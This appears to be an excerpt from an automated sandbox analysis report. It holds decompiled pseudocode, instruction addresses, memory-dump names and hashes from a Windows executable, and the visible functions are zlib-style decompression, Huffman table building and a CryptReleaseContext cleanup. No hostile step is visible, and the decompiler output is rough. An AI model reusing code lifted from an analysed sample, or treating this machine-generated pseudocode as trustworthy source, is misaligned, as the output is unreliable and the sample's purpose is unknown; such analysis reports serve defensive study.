								__edi[1] =  *(__ebp - 4);
								goto L108;
							} else {
								goto L44;
							}
						}
						__eax =  *(__esi + 0x30);
						__edx =  *(__esi + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L35;
						}
						 *(__ebp - 8) = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							 *(__ebp - 0x10) = __ecx;
						} else {
							__eax = __eax - __edx;
							 *(__ebp - 0x10) = __eax;
						}
						__eflags =  *(__ebp - 0x10);
						if( *(__ebp - 0x10) != 0) {
							goto L44;
						} else {
							goto L35;
						}
						L20:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__ecx =  *(__ebp + 8);
						__eax =  *(__ebp + 8);
						__ecx =  !( *(__ebp + 8));
						__eax =  *(__ebp + 8) & 0x0000ffff;
						__ecx =  !( *(__ebp + 8)) >> 0x10;
						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
						__eflags = __ecx;
						if(__ecx != 0) {
							 *__esi = 9;
							__edi[6] = "invalid stored block lengths";
							break;
						}
						 *(__esi + 4) = __eax;
						__eax = 0;
						__eflags =  *(__esi + 4);
						 *(__ebp + 0xc) = 0;
						 *(__ebp + 8) = 0;
						if( *(__esi + 4) == 0) {
							goto L49;
						}
						__eax = 2;
						goto L16;
						L7:
						while( *(_t490 + 0xc) < 3) {
							if( *(_t490 - 4) == 0) {
								goto L107;
							}
							_t479 =  *(_t490 + 0xc);
							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
							 *(_t490 - 4) =  *(_t490 - 4) - 1;
							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
							_t476 =  &(_t476[1]);
							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
						}
						_t436 =  *(_t490 + 8) & 0x00000007;
						_t479 = _t436 & 0x00000001;
						_t438 = _t436 >> 1;
						__eflags = _t438;
						_t488[6] = _t436 & 0x00000001;
						if(_t438 == 0) {
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 1;
							_t479 =  *(_t490 + 0xc) & 0x00000007;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
							goto L98;
						}
						_t442 = _t438 - 1;
						__eflags = _t442;
						if(_t442 == 0) {
							_push(_t485);
							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
							_t493 = _t493 + 0x28;
							_t488[1] = _t448;
							__eflags = _t448;
							if(_t448 == 0) {
								goto L116;
							}
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 6;
							goto L98;
						}
						_t455 = _t442 - 1;
						__eflags = _t455;
						if(_t455 == 0) {
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							_t456 = 3;
							_t33 = _t490 + 0xc;
							 *_t33 =  *(_t490 + 0xc) - _t456;
							__eflags =  *_t33;
							goto L16;
						}
						__eflags = _t455 == 1;
						if(_t455 == 1) {
							 *_t488 = 9;
							 *(_t485 + 0x18) = "invalid block type";
							_t488[8] =  *(_t490 + 8) >> 3;
							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
							L105:
							_t488[7] = _t461;
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							_push(0xfffffffd);
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						goto L98;
					}
					L104:
					__eax =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					goto L105;
					L122:
					__eax =  *(__ebp + 8);
					_push(1);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__eax =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					__edi[2] = __edi[2] + __ebx -  *__edi;
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					goto L100;
					L118:
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
					__ecx =  *(__esi + 0x34);
					__eflags =  *(__esi + 0x30) - __ecx;
					 *(__ebp - 8) = __ecx;
					if( *(__esi + 0x30) == __ecx) {
						 *__esi = 8;
						goto L122;
					}
					__ecx =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__ecx =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__ecx =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					_t409 =  &(__edi[2]);
					 *_t409 = __edi[2] + __ebx -  *__edi;
					__eflags =  *_t409;
					__ecx =  *(__ebp - 8);
					 *(__esi + 0x34) = __ecx;
					goto L120;
				}
			}

0x004043b7
0x004043b9
0x004043be
0x004043c2
0x004043c5
0x004043cb
0x004043cd
0x004043d3
0x004043d9
0x004043dc
0x004043e1
0x004043e4
0x004043f0
0x004043f0
0x004043e6
0x004043e9
0x004043e9
0x004043f2
0x004043f4
0x004043fa
0x004049c2
0x004049c5
0x004049c7
0x004049cd
0x004049d3
0x004049da
0x004049dc
0x004049dc
0x004049dc
0x004049e2
0x00000000
0x00404400
0x00404408
0x00404408
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404935
0x00404935
0x0040493b
0x0040493e
0x00404941
0x00404944
0x00404947
0x0040494c
0x0040494f
0x00404952
0x00404955
0x00404958
0x0040495b
0x00404963
0x00404966
0x00404b89
0x00404b89
0x004049e5
0x004049e5
0x004049e6
0x004049e7
0x004049ef
0x004049f3
0x004049f3
0x0040496c
0x00404979
0x0040497c
0x0040497e
0x00404981
0x00404984
0x00404985
0x00404988
0x0040498b
0x0040498c
0x0040498f
0x00404992
0x00404995
0x00404998
0x0040499a
0x004049a1
0x004049a4
0x004049a4
0x0040499c
0x0040499c
0x0040499e
0x0040499e
0x004049a7
0x004049ab
0x004049ae
0x00404b44
0x00000000
0x004049b4
0x004049b4
0x004049b4
0x004049b7
0x004049b7
0x004049b9
0x004049bc
0x00404402
0x00000000
0x00404405
0x00000000
0x004049bc
0x0040476e
0x0040476e
0x0040476e
0x00404771
0x00404774
0x00404776
0x00404779
0x0040477c
0x0040477f
0x0040477f
0x00404786
0x00404788
0x00000000
0x00000000
0x0040478e
0x00404791
0x00404791
0x00404794
0x00000000
0x00000000
0x00404796
0x0040479a
0x00404a58
0x00404a5b
0x00404a61
0x00404a64
0x00404a64
0x00404a64
0x00404a68
0x00404a6a
0x00404a6f
0x00404a71
0x00404a77
0x00000000
0x00404a77
0x004047a0
0x004047a3
0x004047a6
0x004047aa
0x004047ad
0x004047af
0x004047b2
0x004047b3
0x004047b3
0x004047b9
0x004047c0
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047d7
0x004047da
0x004047f5
0x004047f8
0x004047ff
0x004047ff
0x004047fa
0x004047fc
0x004047fc
0x00404802
0x00404804
0x0040480a
0x0040480b
0x0040480e
0x0040480e
0x00404811
0x00404814
0x00404814
0x00404817
0x0040481a
0x0040481d
0x00000000
0x00000000
0x0040481f
0x00404823
0x00000000
0x00000000
0x00404829
0x0040482c
0x0040482f
0x00404833
0x00404836
0x00404838
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x0040484c
0x0040484f
0x00404852
0x00404854
0x00404857
0x0040485a
0x0040485c
0x0040485f
0x00404862
0x00404865
0x00404867
0x0040486a
0x0040486d
0x00404870
0x00404870
0x0040487a
0x0040487c
0x0040487e
0x00404a94
0x00404a9d
0x00404aa0
0x00404aa6
0x00404aad
0x00404ab0
0x00404ab5
0x00404ab8
0x00404abb
0x00404ac0
0x00404ac3
0x00404ac6
0x00404ac9
0x00404acc
0x00404acf
0x00000000
0x00404ad4
0x00404884
0x00404888
0x0040489c
0x0040489c
0x0040489e
0x0040489e
0x0040489e
0x004048a1
0x004048a4
0x004048a5
0x004048a5
0x004048a5
0x004048a5
0x004048aa
0x00000000
0x004048aa
0x0040488a
0x0040488d
0x00000000
0x00000000
0x00404893
0x00404896
0x00000000
0x00404896
0x004047dc
0x004047df
0x004047e1
0x004047e4
0x004047e7
0x004047ea
0x004047ed
0x004047ed
0x004048b3
0x004048b9
0x004048bc
0x004048c0
0x004048cc
0x004048d0
0x004048d4
0x004048d9
0x004048dc
0x004048df
0x004048e2
0x004048e7
0x004048e8
0x004048f1
0x004048f9
0x004048fc
0x004048fe
0x00404adc
0x00404ae0
0x00404ae0
0x00404ae8
0x00404aeb
0x00404aec
0x00404af2
0x00404af2
0x00404af3
0x00404af6
0x00404af9
0x00404afc
0x00404aff
0x00404b02
0x00404b05
0x00404b0a
0x00404b0c
0x00404b0e
0x00404b11
0x00404b14
0x00000000
0x00404b14
0x00404911
0x00404919
0x0040491b
0x00404b1c
0x00404b1f
0x00404b21
0x00404b27
0x00404b2d
0x00404b34
0x00404b36
0x00404b3c
0x00000000
0x00404b3c
0x00404924
0x0040492a
0x0040492d
0x0040492e
0x00404934
0x00000000
0x004046b8
0x004046bb
0x004046be
0x004046c1
0x004046c4
0x00404721
0x00404721
0x00404721
0x00404725
0x00000000
0x00000000
0x00404727
0x0040472a
0x00404734
0x00404738
0x00404738
0x0040473e
0x00404744
0x0040474c
0x00404752
0x0040475a
0x0040475d
0x0040475f
0x00404a8e
0x00000000
0x00404a8e
0x00404765
0x00404765
0x00404765
0x00404768
0x00000000
0x00000000
0x00000000
0x00000000
0x004046c6
0x004046c6
0x004046c6
0x004046c9
0x004046c9
0x004046cc
0x00000000
0x00000000
0x004046ce
0x004046d2
0x00000000
0x00000000
0x004046d8
0x004046db
0x004046df
0x004046e2
0x004046e4
0x004046e7
0x004046e8
0x004046eb
0x004046eb
0x004046f0
0x004046f0
0x004046f3
0x004046f6
0x004046f9
0x004046fc
0x00404703
0x00404707
0x0040470b
0x0040470e
0x00404711
0x00404714
0x0040471a
0x0040471d
0x0040471d
0x00000000
0x0040462b
0x0040462b
0x0040462e
0x0040462e
0x00404631
0x00000000
0x00000000
0x00404633
0x00404637
0x00000000
0x00000000
0x0040463d
0x00404640
0x00404644
0x00404647
0x00404649
0x0040464c
0x0040464d
0x00404650
0x00404650
0x00404655
0x00404658
0x0040465d
0x0040465f
0x00404662
0x00404665
0x00404668
0x00404a7f
0x00404a7f
0x00404a85
0x00000000
0x00404a85
0x00404670
0x00404676
0x0040467c
0x00000000
0x00000000
0x00404682
0x00404685
0x00404695
0x00404698
0x0040469b
0x0040469e
0x004046a0
0x00000000
0x00000000
0x004046a6
0x004046aa
0x004046ae
0x004046ae
0x004046ae
0x004046b2
0x00000000
0x0040453a
0x0040453a
0x0040453e
0x00000000
0x00000000
0x00404544
0x00404546
0x004045d7
0x004045d7
0x004045da
0x004045dd
0x004045e1
0x004045e3
0x004045e6
0x004045e8
0x004045e8
0x004045eb
0x004045ee
0x004045f1
0x004045f3
0x004045f3
0x004045fd
0x00404602
0x00404605
0x00404608
0x0040460b
0x0040460e
0x00404611
0x00404613
0x00404613
0x00404613
0x00404616
0x0040461c
0x0040461f
0x00404621
0x00404623
0x00404469
0x00404469
0x00404469
0x00000000
0x00404616
0x0040454c
0x0040454f
0x00404551
0x00404575
0x00404578
0x0040457b
0x00404580
0x00404585
0x00404588
0x0040458b
0x00404591
0x00404593
0x00404596
0x004045a3
0x004045a6
0x004045a6
0x004045a9
0x00404598
0x0040459a
0x0040459d
0x0040459e
0x0040459e
0x004045ac
0x004045af
0x004045b2
0x004045b4
0x004045b7
0x004045b9
0x004045bb
0x004045be
0x004045c8
0x004045c8
0x004045ca
0x004045c0
0x004045c0
0x004045c2
0x004045c3
0x004045c3
0x004045be
0x004045b9
0x004045cd
0x004045d1
0x00404a44
0x00404a47
0x00404a4a
0x00404a4d
0x00404a50
0x00404a53
0x00000000
0x00000000
0x00000000
0x00000000
0x004045d1
0x00404553
0x00404556
0x00404559
0x0040455b
0x00000000
0x00000000
0x0040455d
0x00404560
0x0040456a
0x0040456a
0x0040456c
0x00404562
0x00404562
0x00404565
0x00404565
0x0040456f
0x00404573
0x00000000
0x00000000
0x00000000
0x00000000
0x004044dc
0x004044dc
0x004044df
0x004044df
0x004044e2
0x00000000
0x00000000
0x004044e4
0x004044e8
0x00000000
0x00000000
0x004044ee
0x004044f1
0x004044f5
0x004044f8
0x004044fa
0x004044fd
0x004044fe
0x00404501
0x00404501
0x00404506
0x00404509
0x0040450c
0x0040450e
0x00404513
0x00404516
0x00404516
0x00404518
0x00404a12
0x00404a18
0x00000000
0x00404a18
0x0040451e
0x00404521
0x00404523
0x00404526
0x00404529
0x0040452c
0x00000000
0x00000000
0x00404534
0x00000000
0x00000000
0x0040440f
0x00404419
0x00000000
0x00000000
0x00404422
0x00404425
0x00404429
0x0040442e
0x00404431
0x00404432
0x00404432
0x0040443b
0x00404442
0x00404445
0x00404445
0x00404448
0x0040444b
0x004044b9
0x004044c3
0x004044c9
0x004044d1
0x004044d4
0x00000000
0x004044d4
0x0040444d
0x0040444d
0x0040444e
0x00404473
0x00404481
0x00404493
0x00404498
0x0040449b
0x0040449e
0x004044a0
0x00000000
0x00000000
0x004044a6
0x004044aa
0x004044ae
0x00000000
0x004044ae
0x00404450
0x00404450
0x00404451
0x0040445f
0x00404465
0x00404466
0x00404466
0x00404466
0x00000000
0x00404466
0x00404453
0x00404454
0x004049f7
0x00404a00
0x00404a07
0x00404a0d
0x00404a28
0x00404a28
0x00404a2e
0x00404a35
0x00404a37
0x00404a39
0x00404a3f
0x00000000
0x00404a3f
0x00000000
0x0040445a
0x00404a1f
0x00404a1f
0x00404a22
0x00404a25
0x00000000
0x00404b95
0x00404b95
0x00404b98
0x00404b9a
0x00404b9d
0x00404ba0
0x00404ba3
0x00404ba6
0x00404bab
0x00404bad
0x00404baf
0x00404bb2
0x00404bb5
0x00000000
0x00404b4a
0x00404b4d
0x00404b50
0x00404b55
0x00404b5a
0x00404b60
0x00404b63
0x00404b66
0x00404b8f
0x00000000
0x00404b8f
0x00404b68
0x00404b6b
0x00404b6e
0x00404b71
0x00404b74
0x00404b77
0x00404b7c
0x00404b7e
0x00404b80
0x00404b80
0x00404b80
0x00404b83
0x00404b86
0x00000000
0x00404b86

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}

0x004018ba
0x004018bc
0x004018c1
0x004018c4
0x004018ca
0x004018ca
0x004018ce
0x004018d3
0x004018d6
0x004018dc
0x004018dc
0x004018e0
0x004018e5
0x004018ea
0x004018f0
0x004018f0
0x004018f6
0x004018f8

APIs

CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404C19 Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char* _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				void* _v40;
				char _v43;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v180;
				signed int _v184;
				signed int _v244;
				signed int _t190;
				intOrPtr* _t192;
				signed int _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr _t203;
				intOrPtr _t207;
				signed char* _t211;
				signed char _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t228;
				intOrPtr _t229;
				signed int _t231;
				char _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				signed int* _t244;
				signed int _t246;
				signed int _t247;
				signed int* _t248;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t252;
				signed char _t257;
				signed int _t266;
				signed int _t269;
				signed char _t271;
				intOrPtr _t275;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t287;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				intOrPtr _t300;
				signed char _t302;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				intOrPtr _t320;
				unsigned int _t321;
				intOrPtr* _t322;
				void* _t323;

				_t248 = _a4;
				_t296 = _a8;
				_t280 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_t307 = _t296;
				do {
					_t190 =  *_t248;
					_t248 =  &(_t248[1]);
					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
					_t307 = _t307 - 1;
				} while (_t307 != 0);
				if(_v120 != _t296) {
					_t297 = _a28;
					_t241 = 1;
					_t192 =  &_v116;
					_t308 =  *_t297;
					_t249 = _t241;
					_a28 = _t308;
					while( *_t192 == _t280) {
						_t249 = _t249 + 1;
						_t192 = _t192 + 4;
						if(_t249 <= 0xf) {
							continue;
						}
						break;
					}
					_v8 = _t249;
					if(_t308 < _t249) {
						_a28 = _t249;
					}
					_t309 =  &_v60;
					_t193 = 0xf;
					while( *_t309 == _t280) {
						_t193 = _t193 - 1;
						_t309 = _t309 - 4;
						if(_t193 != _t280) {
							continue;
						}
						break;
					}
					_v28 = _t193;
					if(_a28 > _t193) {
						_a28 = _t193;
					}
					_t242 = _t241 << _t249;
					 *_t297 = _a28;
					if(_t249 >= _t193) {
						L20:
						_t312 = _t193 << 2;
						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
						_t250 = _t323 + _t312 - 0x74;
						_t243 = _t242 - _t298;
						_v52 = _t243;
						if(_t243 < 0) {
							goto L39;
						}
						_v180 = _t280;
						 *_t250 = _t298 + _t243;
						_t251 = 0;
						_t195 = _t193 - 1;
						if(_t195 == 0) {
							L24:
							_t244 = _a4;
							_t300 = 0;
							do {
								_t196 =  *_t244;
								_t244 =  &(_t244[1]);
								if(_t196 != _t280) {
									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
									_t280 = 0;
								}
								_t300 = _t300 + 1;
							} while (_t300 < _a8);
							_v12 = _v12 | 0xffffffff;
							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
							_v16 = _t280;
							_v20 = _a40;
							_t199 = _v8;
							_t246 =  ~_a28;
							_v184 = _t280;
							_v244 = _t280;
							_v32 = _t280;
							_a4 = _t280;
							if(_t199 > _v28) {
								L64:
								if(_v52 == _t280 || _v28 == 1) {
									L4:
									return 0;
								} else {
									_push(0xfffffffb);
									goto L67;
								}
							}
							_v48 = _t199 - 1;
							_v36 = _t323 + _t199 * 4 - 0x74;
							do {
								_t203 =  *_v36;
								_v24 = _t203 - 1;
								if(_t203 == 0) {
									goto L63;
								} else {
									goto L31;
								}
								do {
									L31:
									_t207 = _a28 + _t246;
									if(_v8 <= _t207) {
										L46:
										_v43 = _v8 - _t246;
										_t257 = _a40 + _a8 * 4;
										_t211 = _v20;
										if(_t211 < _t257) {
											_t212 =  *_t211;
											if(_t212 >= _a12) {
												_t214 = _t212 - _a12 << 2;
												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
												_t302 =  *(_t214 + _a16);
											} else {
												_t302 = _t212;
												asm("sbb cl, cl");
												_v44 = (_t257 & 0x000000a0) + 0x60;
											}
											_v20 =  &(_v20[4]);
											L52:
											_t313 = 1;
											_t314 = _t313 << _v8 - _t246;
											_t216 = _v16 >> _t246;
											if(_t216 >= _a4) {
												L56:
												_t217 = 1;
												_t218 = _t217 << _v48;
												_t266 = _v16;
												while((_t266 & _t218) != 0) {
													_t266 = _t266 ^ _t218;
													_t218 = _t218 >> 1;
												}
												_v16 = _t266 ^ _t218;
												_t220 = _t323 + _v12 * 4 - 0xb4;
												while(1) {
													_t315 = 1;
													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
														goto L62;
													}
													_v12 = _v12 - 1;
													_t220 = _t220 - 4;
													_t246 = _t246 - _a28;
												}
												goto L62;
											}
											_t277 = _v32 + _t216 * 8;
											do {
												_t216 = _t216 + _t314;
												 *_t277 = _v44;
												_t277[4] = _t302;
												_t277 = _t277 + (_t314 << 3);
											} while (_t216 < _a4);
											_t280 = 0;
											goto L56;
										}
										_v44 = 0xc0;
										goto L52;
									} else {
										goto L32;
									}
									do {
										L32:
										_t269 = _a28;
										_v12 = _v12 + 1;
										_t246 = _t246 + _t269;
										_v56 = _t207 + _t269;
										_t224 = _v28 - _t246;
										_a4 = _t224;
										if(_t224 > _t269) {
											_a4 = _t269;
										}
										_t271 = _v8 - _t246;
										_t225 = 1;
										_t226 = _t225 << _t271;
										_t282 = _v24 + 1;
										if(_t226 <= _t282) {
											L40:
											_t283 = 1;
											_t228 =  *_a36;
											_t284 = _t283 << _t271;
											_a4 = _t284;
											_t319 = _t228 + _t284;
											if(_t319 > 0x5a0) {
												goto L39;
											}
										} else {
											_t320 = _v36;
											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
											if(_t271 >= _a4) {
												goto L40;
											} else {
												goto L36;
											}
											while(1) {
												L36:
												_t271 = _t271 + 1;
												if(_t271 >= _a4) {
													goto L40;
												}
												_t294 =  *((intOrPtr*)(_t320 + 4));
												_t320 = _t320 + 4;
												_t237 = _t236 << 1;
												if(_t237 <= _t294) {
													goto L40;
												}
												_t236 = _t237 - _t294;
											}
											goto L40;
										}
										_t229 = _a32 + _t228 * 8;
										_v32 = _t229;
										_t287 = _t323 + _v12 * 4 - 0xf0;
										 *_t287 = _t229;
										 *_a36 = _t319;
										_t231 = _v12;
										if(_t231 == 0) {
											 *_a24 = _v32;
										} else {
											_t321 = _v16;
											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
											_t233 = _a28;
											_v44 = _t271;
											_v43 = _t233;
											_t235 = _t321 >> _t246 - _t233;
											_t275 =  *((intOrPtr*)(_t287 - 4));
											_t302 = (_v32 - _t275 >> 3) - _t235;
											 *(_t275 + _t235 * 8) = _v44;
											 *(_t275 + 4 + _t235 * 8) = _t302;
										}
										_t207 = _v56;
									} while (_v8 > _t207);
									_t280 = 0;
									goto L46;
									L62:
									_v24 = _v24 - 1;
								} while (_v24 != 0);
								L63:
								_v8 = _v8 + 1;
								_v36 = _v36 + 4;
								_v48 = _v48 + 1;
							} while (_v8 <= _v28);
							goto L64;
						}
						_t306 = 0;
						do {
							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
							_t306 = _t306 + 4;
							_t195 = _t195 - 1;
							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
						} while (_t195 != 0);
						goto L24;
					} else {
						_t322 = _t323 + _t249 * 4 - 0x74;
						while(1) {
							_t247 = _t242 -  *_t322;
							if(_t247 < 0) {
								break;
							}
							_t249 = _t249 + 1;
							_t322 = _t322 + 4;
							_t242 = _t247 << 1;
							if(_t249 < _t193) {
								continue;
							}
							goto L20;
						}
						L39:
						_push(0xfffffffd);
						L67:
						_pop(_t194);
						return _t194;
					}
				}
				 *_a24 = 0;
				 *_a28 = 0;
				goto L4;
			}

0x00404c22
0x00404c28
0x00404c2b
0x00404c2d
0x00404c30
0x00404c33
0x00404c36
0x00404c39
0x00404c3c
0x00404c3f
0x00404c42
0x00404c45
0x00404c48
0x00404c4b
0x00404c4e
0x00404c51
0x00404c54
0x00404c57
0x00404c5a
0x00404c5d
0x00404c5f
0x00404c5f
0x00404c61
0x00404c64
0x00404c6c
0x00404c6c
0x00404c72
0x00404c85
0x00404c8a
0x00404c8b
0x00404c8e
0x00404c90
0x00404c92
0x00404c95
0x00404c99
0x00404c9a
0x00404ca0
0x00000000
0x00000000
0x00000000
0x00404ca0
0x00404ca4
0x00404ca7
0x00404ca9
0x00404ca9
0x00404cae
0x00404cb1
0x00404cb2
0x00404cb6
0x00404cb7
0x00404cbc
0x00000000
0x00000000
0x00000000
0x00404cbc
0x00404cc1
0x00404cc4
0x00404cc6
0x00404cc6
0x00404ccc
0x00404cd0
0x00404cd2
0x00404cea
0x00404cec
0x00404cef
0x00404cf3
0x00404cf7
0x00404cf9
0x00404cfc
0x00000000
0x00000000
0x00404d04
0x00404d0a
0x00404d0c
0x00404d0e
0x00404d0f
0x00404d24
0x00404d24
0x00404d27
0x00404d29
0x00404d29
0x00404d2b
0x00404d30
0x00404d32
0x00404d43
0x00404d47
0x00404d49
0x00404d49
0x00404d4b
0x00404d4c
